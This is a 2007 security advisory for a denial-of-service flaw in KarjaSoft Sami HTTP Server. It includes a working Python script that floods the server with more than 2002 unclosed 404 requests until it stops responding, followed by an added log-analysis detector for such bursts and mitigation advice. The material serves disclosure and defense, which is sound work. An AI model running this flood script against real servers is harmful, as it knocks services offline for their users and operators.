KarjaSoft Sami HTTP Server Connection Handling Remote Denial of Service Vulnerability
Published: 2007-01-22
Updated: 2007-01-30
Affected systems: KarjaSoft Sami HTTP Server 2.0.1
KarjaSoft Sami HTTP Server 1.0.5
KarjaSoft Sami HTTP Server 1.0.4
Description:
BUGTRAQ ID: 22159
Sami HTTP Server is a small HTTP server with PHP support.
Sami HTTP Server cannot handle many consecutive requests for nonexistent objects. If an attacker repeatedly connects to the server (more than 2002 times in a row), the server stops responding to any other requests.
<* Source: shinnai (shinnai@autistici.org)
Link: http://secunia.com/advisories/23901/
*>
Test method:
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching only. The user bears all risk!
import socket

print("-------------------------------------------------------------------------------------------------------")
print("Sami HTTP Server HTTP 404 - Object not found Denial of Service")
print("url: http://www.karjasoft.com")
print("author: shinnai")
print("mail: shinnai[at]autistici[dot]org")
print("site: http://shinnai.altervista.org")
print("")
print("The server is unable to handle more than 2002 requests to nonexistents")
print("files, pages, folders etc.")
print("When the number of requests exceed the 2002, it stops to answer, stops")
print("to write to log file and the admin will be unable to kick or ban users.")
print("The only thing you can do is to kill the process.")
print("-------------------------------------------------------------------------------------------------------")

host = "127.0.0.1"
port = 80

# Probe connection: confirms the server is reachable before the loop starts.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((host, port))
    # Open a fresh connection for every request to a nonexistent file (404)
    # and never close it; past the 2002nd request the server stops answering.
    for i in range(0, 2004):
        request = "GET /some.txt HTTP/1.0 \n\n"
        connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        connection.connect((host, port))
        connection.send(request.encode("ascii"))
        print(i)
except OSError:
    print("Unable to connect. exiting.")
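As an added defender-side example (not part of the original advisory, and not code from shinnai or KarjaSoft): detection logic that spots the request pattern the advisory describes, a single source producing a burst of 404 responses, by running a per-source sliding-window count over web server access log lines. It assumes the server writes Common Log Format lines (the advisory does not state Sami HTTP Server's log format); the sample log, the source addresses and the threshold of 50 are constructed for this example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Common Log Format line (assumed format), e.g.
# 10.0.0.7 - - [22/Jan/2007:10:00:01 +0000] "GET /some.txt HTTP/1.0" 404 0
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)$'
)


def parse_line(line):
    """Return (ip, timestamp, status) for one CLF line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, int(m.group("status"))


def find_404_floods(lines, threshold=50, window=timedelta(seconds=60)):
    """Count 404 responses per source IP inside a sliding time window.

    Returns {ip: peak_count} for every source whose count within any single
    window reaches the threshold. Lines for a given source must be in
    chronological order (the normal case for an access log).
    """
    recent = defaultdict(deque)  # ip -> timestamps of its recent 404s
    peak = defaultdict(int)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue  # skip unparsable or truncated lines
        ip, ts, status = parsed
        if status != 404:
            continue
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] > window:  # drop entries that fell out of the window
            q.popleft()
        peak[ip] = max(peak[ip], len(q))
    return {ip: n for ip, n in peak.items() if n >= threshold}


def build_sample_log():
    """Constructed sample log for the example (not a real Sami HTTP Server log)."""
    base = datetime.strptime("22/Jan/2007:10:00:00 +0000", "%d/%b/%Y:%H:%M:%S %z")

    def fmt(ip, offset, path, status):
        ts = (base + timedelta(seconds=offset)).strftime("%d/%b/%Y:%H:%M:%S %z")
        return '%s - - [%s] "GET %s HTTP/1.0" %d 0' % (ip, ts, path, status)

    lines = [fmt("10.0.0.5", 0, "/index.html", 200)]
    # One client hammering a nonexistent file: 80 requests within 8 seconds.
    lines += [fmt("10.0.0.7", i // 10, "/some.txt", 404) for i in range(80)]
    # A normal client with a few mistyped URLs spread over several minutes.
    lines += [fmt("10.0.0.9", 120 * i, "/typo%d.html" % i, 404) for i in range(3)]
    return lines


if __name__ == "__main__":
    for ip, n in sorted(find_404_floods(build_sample_log()).items()):
        print("ALERT: %s peaked at %d 404s within one window" % (ip, n))
```

Because the advisory notes that the server stops writing its log once it hangs, a log-based alert has to fire well before the 2002-request mark; pair it with an external reachability check and a per-source connection limit at the firewall or reverse proxy, since the affected versions have no vendor fix.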
Recommendation:
Vendor patch:
KarjaSoft
---------
The vendor has not yet released a patch or upgrade. We recommend that users of this software watch the vendor's homepage for the latest version:
http://www.karja.com/